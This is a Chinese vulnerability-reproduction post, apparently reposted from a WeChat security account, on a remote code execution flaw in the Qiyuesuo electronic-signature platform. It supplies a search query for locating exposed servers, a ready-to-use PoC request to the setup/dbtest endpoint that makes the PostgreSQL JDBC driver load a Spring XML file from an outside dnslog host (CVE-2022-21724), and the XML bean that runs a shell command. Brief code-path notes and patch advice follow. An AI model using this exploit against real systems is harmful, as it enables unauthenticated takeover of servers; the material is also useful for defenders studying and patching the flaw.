先关注,不迷路.
免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
漏洞介绍
契约锁是一个电子签章及印章管控平台,提供的电子文件具有与纸质文件一样的法律效力。近日,契约锁发布安全补丁修复了远程代码执行漏洞。该漏洞允许未经过身份认证的攻击者可以利用该漏洞在契约锁管理端上执行任意代码,从而完全控制服务器。。
语法
app="契约锁-电子签署平台"&& port="9181"漏洞复现
POC:
(这微信页面直接复制代码格式会乱,可以浏览器打开复制)
/setup/dbtest/api/setup/dbtest?db=POSTGRESQL&host=localhost&port=5321&username=root&name=test%2F%3FsocketFactory%3Dorg%2Espringframework%2Econtext%2Esupport%2EClassPathXmlApplicationContext%26socketFactoryArg%3Dhttp%3A%2F%2Fxxx.dnslog.cn%2F1%2Exml
漏洞分析
接口位置:
qiyuesuoprivoss.jar!BOOT-INFclassescomqiyuesuosetupSetupController.class参数为db、name、host、port、username、password
跟进validateDatabase 方法 ,来到
privoss.jar!BOOT-INFclassescomqiyuesuosetupSetupService.class
跟进
支持的jdbc
漏洞利用的是PostgreSQL JDBC Driver RCE(CVE-2022-21724)
<beansxmlns="http://www.springframework.org/schema/beans"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns:p="http://www.springframework.org/schema/p"xsi:schemaLocation="http://www.springframework.org/schema/beanshttp://www.springframework.org/schema/beans/spring-beans.xsd"><beanid="exec"class="java.lang.ProcessBuilder"init-method="start"><constructor-arg><list><value>/bin/sh</value><value>-c</value><value>touch /tmp/test</value></list></constructor-arg></bean></beans>
修复意见
官方已更新补丁,及时更新最新版本:https://www.qiyuesuo.com/more/security/servicepack
如有侵权,请及时联系删除。
原文始发于微信公众号(PokerSec):【漏洞复现】契约锁远程代码执行漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论